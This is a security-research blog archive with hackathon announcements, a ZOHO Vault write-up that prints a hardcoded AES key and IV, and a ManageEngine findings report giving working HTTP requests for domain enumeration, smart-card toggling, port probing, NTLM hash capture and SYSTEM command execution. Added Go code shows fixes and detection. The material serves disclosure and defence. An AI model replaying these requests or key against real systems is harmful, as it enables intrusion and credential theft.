Wednesday, September 26, 2018

3rd 0DAYALLDAY RESEARCH EVENT

Hacking, Drinking, & Hacking...

When: September 29th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

  • There are several great places nearby to grab food.
  • There will be some free booze (vodka, whiskey, beer). If you want, you can bring some more.

Rules:

  • Must participate. Researching for others counts.
  • If you find a vulnerability, it's yours. (Unless otherwise noted. For vulnerabilities that involve health, or vendors known to be sue-happy, full disclosure will be required to protect all involved.)
  • If there is a bug bounty, you get to choose what to do with the money: sponsor the next event or keep it. Maybe a little of both.
  • If you smoke (analog or vape), please step outside.
  • Don't be a dick.

Prizes:

  • Most CVEs found - $50 Gift Card to Amazon
  • Best vulnerability found - $25 Gift Card to Amazon
  • Community MVP - $25 Gift Card to Amazon
  • Miss Congeniality - Hugs and Free 0DayAllDay T-Shirt

Hacking:

This quarter's theme is Hardware Hacking.

  • Arris Surfboard - Model SB6141 (Forced full disclosure)
  • Netgear - CM500-100NAS Cable Modem (Forced full disclosure)
  • AT&T Router/Gateway - Model 5268ac
  • Guardzilla - All-In-One Video Security System
  • D-Link N300 WiFi Router - Model DIR-605L H/W Ver.: B3, F/W Ver.: 2.09UI
  • TP-Link 300 Wireless N Router - Model TL-WR841N
  • TP-Link 150 Wireless N Router - Model TL-WR741ND
  • Carl and Stuart Flexi Cam
  • Space Invaders
  • WYZE Cam - Model WYZECP1
  • A couple of surprise targets as well.
  • If you have something you want to hack on, feel free to bring it. (Please note you will have to release us from any damage that might happen, aka we will most likely break it.)

Details of targets

Listed here is any work done by others; it can be used as a reference or to jump-start our work.

  • Carl and Stuart Flexi Cam: Blog
  • AT&T Router/Gateway: Blog
  • AT&T Router/Gateway: Slides
  • Guardzilla: not really vulnerabilities, but interesting info that should be validated (Post)
  • TP-Link 300 TL-WR841N: we have already done some work on this one and found some easy wins.
  • All targets should be Googled beforehand just to double-check whether there is any pre-existing work.

Getting started

  • Slides INIT_6 did for PWN School: a brief overview (Slides)

Tools & Equipment

  • A laptop is required.
  • If you have a Bus Pirate, Shikra, OSEPP FTDI, JTAGulator, or any UART or JTAG equipment, you should bring it. We will have enough equipment for teams of 3 or 4 people. That being said, more is always better.
  • We will have 2 soldering irons, header pins, jumper wires, etc. However, if you have some, feel free to bring them.

Software

  • Kali Linux (already has most of the tools needed; you can use Windows, but Linux will be better)
  • Binwalk (GitHub). Make sure you follow this install guide and install all the dependencies (GitHub Wiki).
  • OpenOCD for JTAG (Site)

Tuesday, July 17, 2018

ZOHO - A Story Of Where Not To Store Keys

The second 0DayAllDay event was June 9th, 2018 from 10am to 9pm. It was organized by Spectant Security and Blackmarble.sh. More information on 0DayAllDay can be found here.

The last 0DayAllDay event was focused on password managers; Thycotic, Keeper, and ZOHO Vault were some of the targets. The only bug found was in ZOHO Vault.

ZOHO Vault is an online password manager focused on businesses. Included in their software is an AD/LDAP provisioning application. The application asks some standard questions: your master ZOHO account username and password, a Domain Administrator username and password (which isn't really needed), and connection details. After you fill this out, the application connects to the Domain Controller and you select the users you want to import into ZOHO Vault.

The AD/LDAP provisioning application stores the AES encryption key and IV in the source code. Obtaining these strings is trivial: you can use JetBrains dotPeek, for example, to decompile the executable.

Once decompiled, you can see that the Provisioning_Utils namespace has a CryptUtil class that uses a static string for both the key and the IV.

using System.Text;

namespace Provisioning_Utils
{
    public class CryptUtil
    {
        private static UTF8Encoding encoding = new UTF8Encoding();
        // The AES key and IV are compile-time string constants, identical in every copy of the application
        private static byte[] kBytes = CryptUtil.encoding.GetBytes("6ZUJiqpBKHuNuS@*");
        private static byte[] tmpIV = CryptUtil.encoding.GetBytes("BJLTHGVTPJQMDEXO");
        // (remainder of the decompiled class not shown)
    }
}

The vault.zoho.com account password and the Windows Administrator account password are stored in the provisioning.conf file as encrypted text. The provisioning application can be run on any computer on the domain, and access to this provisioning.conf file is not guaranteed to be protected. In some cases it would be fairly easy for an unauthorized party to access the provisioning.conf file.

I have successfully written a new standalone program that takes the encrypted text as an argument and decrypts the password, showing the plaintext password.

This is the first C# program I have made. It was pretty easy; I just needed to copy and paste the decompiled code. I Googled a few things and surprisingly got it to build on the second try.

For the full source code and binary, check out my GitHub.

You do need some other access to exploit this; however, for pentesters, finding this provisioning.conf file is game over: they gain access to all the passwords saved in ZOHO Vault (Edit: you need a secondary password to decrypt the Vault) and have Domain Admin. It was reckless to have the keys to your kingdom so easily available.

ZOHO issued me their own CVE number: ZVE-2018-0976

Disclosure Timeline:
Found Vulnerability: June 8th, 2018
Disclosed to ZOHO: June 10th, 2018
ZOHO Closed: July 12th, 2018

Reward: Nothing :( 10 stupid points. I can't buy beer with points.

EDIT:

ZOHO Updates Ticket: July 13th, 2018

Reward: $100 and 10pts. We have beer money for the next event now.

After making a post, I like to watch Google Analytics for my blog just to see the kind of response I get. I got a couple of referrals from supportlab.zoho.com and docs.zoho.com less than an hour after posting on Twitter. I think they have a Twitter bot looking for their name. Anyway, they updated the ticket I had open with them.

(Image: ZOHO's ticket response)

It is true, I had an error: even though you have the ZOHO Vault login password, you need a secondary encryption password to get access to the content (View Passwords).

They fixed the vulnerability by removing the unneeded ZOHO account password and using dynamic unique keys to encrypt the scoped authentication token and AD password for every installation.
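Added example (not ZOHO's code and not the author's decryptor): the hardcoded-key pattern from the decompiled CryptUtil class beside the per-installation key approach that ZOHO's fix describes, written in Go so it runs with the standard library alone. It assumes AES-CBC with PKCS#7 padding for the static version, since the post shows only the key and IV, and uses constructed key and IV strings; where the per-installation key is stored is left out.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
)

// Constructed stand-ins for a key and IV compiled into a binary; the real strings
// from the decompiled CryptUtil class are deliberately not reused here.
var (
	staticKey = []byte("constructed-16by") // 16 bytes: AES-128
	staticIV  = []byte("constructed-iv16") // 16 bytes: one AES block
)

// encryptStatic is the weak pattern: key and IV are program constants (AES-CBC with
// PKCS#7 padding is assumed; the post shows only the key and IV). Every copy of the
// program carries the same key, so anyone who can read the binary can read the config.
func encryptStatic(plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(staticKey)
	if err != nil {
		return nil, err
	}
	pad := block.BlockSize() - len(plaintext)%block.BlockSize()
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, staticIV).CryptBlocks(out, padded)
	return out, nil
}

// Installation models the fix ZOHO described: a key generated once per install instead
// of shipped in the code. Where that key lives (file ACLs, an OS key store) is out of scope.
type Installation struct{ aead cipher.AEAD }

// NewInstallation draws a fresh 256-bit key from the OS CSPRNG.
func NewInstallation() (*Installation, error) {
	key := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	return &Installation{aead: aead}, err
}

// Seal encrypts with AES-GCM under a fresh random nonce and returns nonce||ciphertext||tag:
// equal plaintexts never look alike, and any modification of the stored blob is rejected by Open.
func (in *Installation) Seal(plaintext []byte) ([]byte, error) {
	nonce := make([]byte, in.aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return in.aead.Seal(nonce, nonce, plaintext, nil), nil
}

// Open reverses Seal; it fails under any other installation's key.
func (in *Installation) Open(sealed []byte) ([]byte, error) {
	n := in.aead.NonceSize()
	if len(sealed) < n {
		return nil, fmt.Errorf("ciphertext too short: %d bytes", len(sealed))
	}
	return in.aead.Open(nil, sealed[:n], sealed[n:], nil)
}

func main() {
	a, _ := encryptStatic([]byte("Hunter2!"))
	b, _ := encryptStatic([]byte("Hunter2!"))
	inst, _ := NewInstallation()
	s1, _ := inst.Seal([]byte("Hunter2!"))
	s2, _ := inst.Seal([]byte("Hunter2!"))
	fmt.Println("static key+IV repeats:", bytes.Equal(a, b), "per-install repeats:", bytes.Equal(s1, s2))
}
```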

Final notes:

What this tells me is that the authentication token doesn't expire; I thought this was true as I played around with it as well. It was clear text before in the provisioning.conf. Now I am interested in the new way they are doing the keys. I'll have to take another look when I get some time.

Friday, June 8, 2018

2nd 0DAYALLDAY RESEARCH EVENT

Hacking, Drinking, & Hacking...

When: June 9th, 2018
Time: 10:00 AM to 11:59 PM
Where: GeniusDen 3106 Commerce St, Dallas, TX 75226

RSVP on Meetup

Food & Drinks:

  • There are several great places nearby to grab food.
  • There will be some free booze (vodka, whiskey, beer). If you want, you can bring some more.

Rules:

  • Must participate. Researching for others counts.
  • If you find a vulnerability, it's yours.
  • If there is a bug bounty, you get to choose what to do with the money: sponsor the next event or keep it. Maybe a little of both.
  • If you smoke (analog or vape), please step outside.
  • Targets are on the 192.168.66.0/24 network; stay there :)
  • Don't be a dick.

Prizes:

  • Most CVEs found - $50 Gift Card to Amazon
  • Best vulnerability found - $25 Gift Card to Amazon
  • Community MVP - $25 Gift Card to Amazon
  • Miss Congeniality - Hugs and Free 0DayAllDay t-shirt

Hacking:

This quarter's theme is Password Managers and their associated Android applications.

Details of targets

  • Domain Server and General Info

    • HOST
      • Domain Controller Windows Server 2016
      • IP: 192.168.66.100
      • Domain: blackmarble.sh
      • Admin: administrator
      • Pass: ][Password][
      • Other users:
        • fox.zero
        • fox.one
        • ...
        • fox.ten
      • Global Read-Only Share: //WIN-7LPVLIICTR2/Data
        • cacert.pem: this file is for importing into Burp for Android.
        • apks folder has all the .apk install files along with the decompiled source code.
        • Keeper folder has the install files for Keeper along with its agents.
        • ManageEngine PMP folder has the Windows agent and the installer.
        • gray folder has a .net decompiler program and injector
        • Thycotic has the agents and installer.
      • Global Read/Write Share: //WIN-7LPVLIICTR2/Share
        • Feel free to put whatever here.
    • Software
  • Android

    • HOST

    • Software

      • Keeper
      • Thycotic Secret Server
      • Thycotic PAM
      • Password Manager - Zoho Vault
      • PMP (Couldn't get to work)
      • LastPass
      • Norton IDSafe
      • Google Play store works. If you want to attack something else, that's okay.
    • Burp Configuration

      • Import the cacert.pem into your Burp. (Make sure you regenerate it after you leave.)
      • In the Android VM, Hit ALT+F1 to access terminal.
      • su to root
      • Configure iptables to redirect traffic to your Burp.
      • iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
      • iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination BURP_ADDRESS:BURP_PORT
      • Restart the VM if you want to flush the existing iptables rules.
      • If you want to use your own cert, check out my blog entry here.
    • ADB Configuration

      • Android documentation can be found here.
      • In the Android VM, Hit ALT+F1 to access terminal.
      • Get the IP Address: ifconfig
      • adb connect ip_address

Wednesday, May 2, 2018

First 0DAY ALL DAY Event Findings

The first 0DAYALLDAY event was held on April 7th, 2018 from 11am to Midnight. It was organized by Spectant Security and the Blackmarble group (blackmarble.sh):

https://spectant.io
https://blackmarble.sh/0-day-all-day/

0DAYALLDAY is a quarterly REAL "Hack-A-Thon" where security researchers from the DFW Metroplex come together to hunt for bugs in supplied software.

The first event was invitation only to work out the kinks and observe the feasibility and logistics of future events. You can find more information directly at the 0DAYALLDAY website: https://www.0dayallday.org/

The main software Spectant targeted was the Manage Engine AD Self Service Plus installation and the Manage Engine AD Manager Plus installation. The following table lists the issues found along with their risk scores:

Software           | Finding                                                                    | Risk Rating
ADSelfService Plus | Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration  | High
ADSelfService Plus | ANY User Can remove and enable/disable smart cards for other users         | High
ADSelfService Plus | Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration    | Medium
ADSelfService Plus | Authenticated Host and Port Enumeration                                    | Medium
ADSelfService Plus | Admin DBBackup Remote Host Enumeration and SMB Capture                     | Informational
ADManager Plus     | Application Admin can Run Commands as SYSTEM via User Modification Scripts | Informational

The following section describes the technical details for each finding.

Detailed Findings

Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration

Software           | Finding                                                                   | Risk Rating
ADSelfService Plus | Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration | High

The default installation of Manage Engine's ADSelfService Plus application allows anyone to search for employees or view an organizational chart. By sending the following unauthenticated request, an attacker can enumerate the entire domain:


GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/authorization.do
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


This chart on the surface shows various information about the user and the domain that user is associated with:

However, by viewing the returned HTML source code for the OrganizationChart.cc request, much more detailed information is available about the underlying AD structure:


<div style="padding:3px 5px;" id="CN=Administrator,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=Guest,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=DefaultAccount,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...


Not only can a potential attacker obtain usernames, emails, phone numbers, and potentially user photos of victims, they can also obtain which AD domains the users are a part of as well as which OUs they are in. Since the Organization Chart displays a list of ALL users within the AD, it is also possible for a potential attacker to determine what software is installed across the organization by observing which user, system, and service accounts are present. All of this can be combined to build and execute a very convincing social engineering attack.

Recommendation:

As a workaround, it is recommended that "Employee Search" be disabled from the Configuration options within ADSelfService Plus. However, Manage Engine should really put this search feature behind the authentication portal in the default install.

ANY User Can remove and enable/disable smart cards for other users

Software           | Finding                                                            | Risk Rating
ADSelfService Plus | ANY User Can remove and enable/disable smart cards for other users | High

While doing cross-account access testing, it was discovered that the /WC/SmartCard.do application endpoint allowed even the lowest-privileged user to enable and disable any smart card configured in the system by directly interfacing with the endpoint. This is done by sending the following request:


POST /WC/SmartCard.do?mTCall=enableDisableSmartCard HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 79
Cookie: JSESSIONIDADSSP=00B684925C94F202DBF9139805493DD5; JSESSIONID=08C2A68C1BBF9E4E46ABE59844D3BBA3; NTLM_LOGGED_OUT=true; adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0; JSESSIONIDSSO=EBF4FB52BC685DC4A2FF9639FAF75D83
DNT: 1
Connection: close

IS_ENABLED=false&SMARTCARD_ID=1&URL=&adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0


The request above will cause the application to either enable or disable the smart card referenced with the SMARTCARD_ID parameter:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 132
Date: Wed, 11 Apr 2018 11:21:52 GMT
Connection: close

{"sSTATUS":"ads.admin.logon_settings.smartcard_settings.enable_disable_success","SMARTCARD_NEEDS_RESTART":false,"IS_ENABLED":false}


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to enable or disable smart card authentication requirements.

Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration

Software           | Finding                                                                 | Risk Rating
ADSelfService Plus | Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration | Medium

During testing it was also noted that even if the "Employee Search" option and the OrganizationChart.cc endpoint were disabled, it was still possible for the lowest-privilege users to access full User, Group, Domain, and Computer/System lists from the /ADSPopupAction.do application endpoint.

This endpoint contains a method called getDataModelUIDesign that expects a JSON parameter string in a POST request. Within the JSON parameter you can specify an objectTypeId to enumerate the Users, Groups, Domains, and Computers/Systems. This is evident by sending the following request with objectTypeId: 2


POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/RestrictUsers.do?methodToCall=generate&action=staleAccountPage&init=true&selectedTab=admin&selectedTile=RestrictUsersSettings&domains=DC=blackmarble,DC=sh&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 261
Cookie: JSESSIONIDADSSP=CF41E5FBF4EE234934E3C64D4211352E; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=C77D3B15E0F4DB4A094B7303DF810027; adscsrf=969db194-807f-48d8-b8ff-63668b69b927;
DNT: 1
Connection: close

params={"popupId":5,"objectTypeId":2,"viewModelId":11,"domainName":"blackmarble.sh","allDomains":false,"isForestDomainsOnly":false,"colFilter":{},"popupDataModelId":11,"searchText":"","start":1,"end":100,"range":100}&adscsrf=969db194-807f-48d8-b8ff-63668b69b927


The above request will return a list of Users and their corresponding domain:



By changing the objectTypeId to 4 in the following request it is possible to see a full list of systems associated with the AD Domain including which systems are the designated Domain Controllers:


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access any potentially sensitive objectTypeIds.

Authenticated Host and Port Enumeration

Software           | Finding                                 | Risk Rating
ADSelfService Plus | Authenticated Host and Port Enumeration | Medium

One of the more interesting endpoints discovered during testing was the /JumpToAction.do application endpoint. This endpoint contains a method called testConnection that expects a parameter called URL. If you supply an IP/URL and PORT combination, the application attempts to connect to the supplied URL and PORT and returns success or failure depending on the status of the connection:


POST /JumpToAction.do?mTCall=testConnection HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 73
Cookie: JSESSIONIDADSSP=2C1D14504E2E15CB00C7BD5F14D6BE17; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; adscsrf=7094a261-8a15-4492-ac0c-75b35a539700; JSESSIONIDSSO=8057D2014941CAC8031120C1E346B3C1
DNT: 1
Connection: close

URL=http://[REDACTED]:22/&adscsrf=7094a261-8a15-4492-ac0c-75b35a539700


The request above will cause the system to check if PORT 22 is open on HOST [REDACTED]. Since this port is open, it will return "success":


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 9
Date: Wed, 11 Apr 2018 12:24:07 GMT
Connection: close

success


Combining this with the ADSPOPUP vulnerability allows an attacker to potentially fingerprint the entire network based on open ports and software installed.

Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access the testConnection method of the JumpToAction.do application endpoint.
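Added example, not part of the findings report: detection logic for the four ADSelfService Plus endpoints above (OrganizationChart.cc without a session, SmartCard.do enableDisableSmartCard, ADSPopupAction.do getDataModelUIDesign and JumpToAction.do testConnection) run over constructed access-log lines. The log layout, the account names and the administrator allow-list are assumptions for the example; a real deployment's access log needs its own parser and a way to record the authenticated user.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Event is one record of a constructed log layout: time client user method request status.
type Event struct {
	Time, Client, User, Method, Path string
	Query                            url.Values
}

// ParseLine parses one log line; "-" in the user column means no authenticated session.
func ParseLine(line string) (Event, error) {
	f := strings.Fields(line)
	if len(f) != 6 {
		return Event{}, fmt.Errorf("want 6 fields, got %d: %q", len(f), line)
	}
	u, err := url.ParseRequestURI(f[4])
	if err != nil {
		return Event{}, err
	}
	return Event{f[0], f[1], f[2], f[3], u.Path, u.Query()}, nil
}

// Rule is one endpoint from the findings. An Unauthenticated rule fires when no user
// is present (the org-chart case); the others fire when the caller is not a known admin.
type Rule struct {
	Name, Method, Path, Param, Value, Severity string
	Unauthenticated                            bool
}

var rules = []Rule{
	{"Unauthenticated OrganizationChart.cc access (AD enumeration)", "GET", "/OrganizationChart.cc", "methodToCall", "show", "High", true},
	{"Smart card enable/disable by non-admin", "POST", "/WC/SmartCard.do", "mTCall", "enableDisableSmartCard", "High", false},
	{"ADSPopup object enumeration by non-admin", "POST", "/ADSPopupAction.do", "methodToCall", "getDataModelUIDesign", "Medium", false},
	{"Host/port probe via testConnection by non-admin", "POST", "/JumpToAction.do", "mTCall", "testConnection", "Medium", false},
}

type Alert struct{ Severity, Name, User, Client string }

// DetectLines parses each line and applies every rule; admins is the constructed allow-list.
func DetectLines(lines []string, admins map[string]bool) ([]Alert, error) {
	var out []Alert
	for _, l := range lines {
		e, err := ParseLine(l)
		if err != nil {
			return nil, err
		}
		for _, r := range rules {
			if e.Method != r.Method || e.Path != r.Path || e.Query.Get(r.Param) != r.Value {
				continue
			}
			if (r.Unauthenticated && e.User == "-") || (!r.Unauthenticated && !admins[e.User]) {
				out = append(out, Alert{r.Severity, r.Name, e.User, e.Client})
			}
		}
	}
	return out, nil
}

// Constructed sample log: one hit per finding, then two benign administrator requests.
var sampleLog = []string{
	"2018-04-11T11:20:01Z 10.0.0.9 - GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash 200",
	"2018-04-11T11:21:52Z 10.0.0.5 fox.one POST /WC/SmartCard.do?mTCall=enableDisableSmartCard 200",
	"2018-04-11T11:30:10Z 10.0.0.5 fox.one POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign 200",
	"2018-04-11T12:24:07Z 10.0.0.5 fox.one POST /JumpToAction.do?mTCall=testConnection 200",
	"2018-04-11T12:25:00Z 10.0.0.2 administrator POST /JumpToAction.do?mTCall=testConnection 200",
	"2018-04-11T12:26:00Z 10.0.0.2 administrator GET /OrganizationChart.cc?methodToCall=show 200",
}

func main() {
	alerts, err := DetectLines(sampleLog, map[string]bool{"administrator": true})
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("[%s] %s: user=%s from %s\n", a.Severity, a.Name, a.User, a.Client)
	}
}
```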

Admin DBBackup Remote Host Enumeration and SMB Capture

Software           | Finding                                                | Risk Rating
ADSelfService Plus | Admin DBBackup Remote Host Enumeration and SMB Capture | Informational

While testing the application it was noted that the admin account for the ADSelfService Plus application can execute database backups. This account can specify the local system path used for storing the database backups. The application does not validate that the path supplied by the admin is a valid local system path and will attempt to access any path supplied.

Using this knowledge, it is possible for an attacker with admin privileges to supply a remote UNC path for the database backup to be stored at. This causes the system to attempt to authenticate to the remote, attacker-supplied system. During this attempted authentication the NTLMv2 hash can be retrieved:


[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\MANAGEENGINE-01$
[SMB] NTLMv2-SSP Hash : MANAGEENGINE-01$::BLACKMARBLE:1122334455667788:57AB85[...SNIP...]380032002E8000000000000000000
[SMB] Requested Share : \\[REDACTED]\IPC$

[SMB] Requested Share : \\[REDACTED]\TEST2
[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::BLACKMARBLE:1122334455667788:D7446276CF[...SNIP...]3100330038000000000000000000


Recommendation:

It is recommended that the application verify that the administrator is only supplying local system paths.
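Added example of the recommended check, not ManageEngine's code: a validator for the admin-supplied backup path that accepts only absolute local drive paths under a constructed allow-list and rejects UNC and device-prefix paths (so the server never authenticates to a remote host), drive-relative paths and ".." traversal. It is written in Go with string checks so it behaves the same on any platform.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// drivePrefix matches an absolute Windows drive path such as C:\ (after forward
// slashes have been normalised to backslashes).
var drivePrefix = regexp.MustCompile(`^[A-Za-z]:\\`)

// ValidateBackupPath accepts only an absolute local drive path at or beneath one of
// allowedBases (a constructed policy) and rejects UNC paths, \\?\ and \\.\ device
// prefixes, drive-relative paths, control characters and ".." traversal.
// Caveat: a drive letter mapped to a network share still points off-host, so a
// production check should also verify the drive type on the server.
func ValidateBackupPath(p string, allowedBases []string) error {
	p = strings.TrimSpace(p)
	if p == "" {
		return fmt.Errorf("empty path")
	}
	if strings.ContainsAny(p, "\x00\r\n") {
		return fmt.Errorf("control characters in path")
	}
	// \\host\share, //host/share and \\?\UNC\... all make the server authenticate to host.
	if strings.HasPrefix(p, `\\`) || strings.HasPrefix(p, "//") {
		return fmt.Errorf("UNC or device path rejected: %q", p)
	}
	norm := strings.ReplaceAll(p, "/", `\`)
	if !drivePrefix.MatchString(norm) {
		return fmt.Errorf("not an absolute local drive path: %q", p)
	}
	for _, seg := range strings.Split(norm, `\`) {
		if seg == ".." {
			return fmt.Errorf("parent-directory traversal rejected: %q", p)
		}
	}
	lower := strings.ToLower(strings.TrimRight(norm, `\`))
	for _, base := range allowedBases {
		b := strings.ToLower(strings.TrimRight(strings.ReplaceAll(base, "/", `\`), `\`))
		if lower == b || strings.HasPrefix(lower, b+`\`) {
			return nil
		}
	}
	return fmt.Errorf("path outside the allowed backup directories: %q", p)
}

func main() {
	bases := []string{`C:\Backups`} // constructed allow-list
	for _, p := range []string{
		`C:\Backups\2018-04-11`,
		`C:/Backups/nightly`,
		`\\10.0.0.99\TEST2`,
		`\\?\UNC\10.0.0.99\TEST2`,
		`C:\Backups\..\Windows\Temp`,
		`D:\Backups`,
		`C:Backups`,
	} {
		if err := ValidateBackupPath(p, bases); err != nil {
			fmt.Println("REJECT", err)
		} else {
			fmt.Println("ACCEPT", p)
		}
	}
}
```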

Application Admin can Run Commands as SYSTEM via User Modification Scripts

Software       | Finding                                                                    | Risk Rating
ADManager Plus | Application Admin can Run Commands as SYSTEM via User Modification Scripts | Informational

It was noted during testing that there is a section of the user modification form where the admin can supply a custom script that executes immediately, by sending the following request:


POST /ExecuteForm.do?methodToCall=submitExecuteLayout&templateCategoryId=6&isWorkFlowMode=false HTTP/1.1
Host: 127.0.0.1:7778
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7778/ExecuteForm.do?methodToCall=init&operation=singleModify&templateCategoryId=6&guid={E034A7E7-0ED8-4761-82A0-C92E3304F943}&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 146672
Cookie: JSESSIONIDADSSP=973B256F550EEAF12D8858EC8C3D1601; JSESSIONID=70D75AB6A980017519AE98671F18838A; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=DC158F7DF0B24F4DC0A4884CAD8C74CD; adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1; CUSTOM_SSO_TICKET=1523459129211; CUSTOM_SSO_APP_NAME="ManageEngine ADManager Plus"; CUSTOM_SSO_APP_TAG_NAME=ADMP; APPS_PANE_LOADED=true
DNT: 1
Connection: close

FcExecuteLayout= ...[SNIP]...
{"tabId":"32","tabName":"Custom%20Attributes","layoutId":"8","tabSeq":"7","isO365Tab":"false","description":"description","isHidden":"false","FcRhsLayoutSubTabGroup":[{"tabId":"32","subTabGroupId":"32","subTabGroupName":"Custom%20Attributes","isOptionTab":"false","isCustomTab":"true","optionTabType":"","FcRhsLayoutSubTab":[{"subTabId":"37","subTabGroupId":"32","subTabName":"Custom%20Attributes","subTabType":"","isDefaultSelectedSubTab":"false","isHidden":"true","lhsSubTabId":"18","fieldGroupsStatusMsg":"No%20Field%20Groups%20are%20available.","FcRhsLayoutFieldGroup":[{"fieldGroupId":"55","subTabId":"37","fieldGroupName":"Custom%20Attributes","description":"Description","fieldGroupSeq":"1","isSingleColumn":"false","isHidden":"false","FcRhsLayoutField":[{"ComponentVals":{"scriptEnabled":true,"scriptCommand":"whoami","ignoreWarning":true},"AvoidDuplicationDetails":{"duplicationLevel":"","isApplyNamingFormat":"false","stopExecution":"false","isAppendingNumber":"true","isAppendCharsSpecified":"false","appendStartIndex":"2","suffixLength":"2","fillingChars":"0","formatId":"-1"},"layoutFieldId":"245","fieldGroupId":"55","fieldId":"2616","componentId":"57","attribSeq":"1","isHidden":"false","position":"RHS","attribDisplayText":"Custom%20Script","defaultValue":"","isMandatory":"false","isReadOnly":"false","isEnabledForBulkEdit":"false","isAvoidDuplication":"false","isImmdeiateDuplicationCheck":"false","isCustomField":"false","minLen":"2","maxLen":"255","systemRestrictedLength":"255","helpText":"","isDomainSpecificField":"false","domainSpecificDataProviderClassName":"","validationIds":"","isAvailableInTemplate":"true","isRestricted":"false","isAuthorized":"true","isComponentLevelAuthorized":"false","iamAppId":"1","parentFieldId":"0","childFieldArr":[]}]}]}]}]}]}&templateId=8&isCopiedObject=false&isDirectCopyObject=false&isOverWriteADValue=true&adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1


This request (redacted for length) causes the application to immediately execute the "whoami" command and respond with the output of that command:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
expires: 1970-01-01 05:30:00
pragma: no-cache
cache-control: no-cache, no-store
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Date: Wed, 11 Apr 2018 15:07:25 GMT
Connection: close
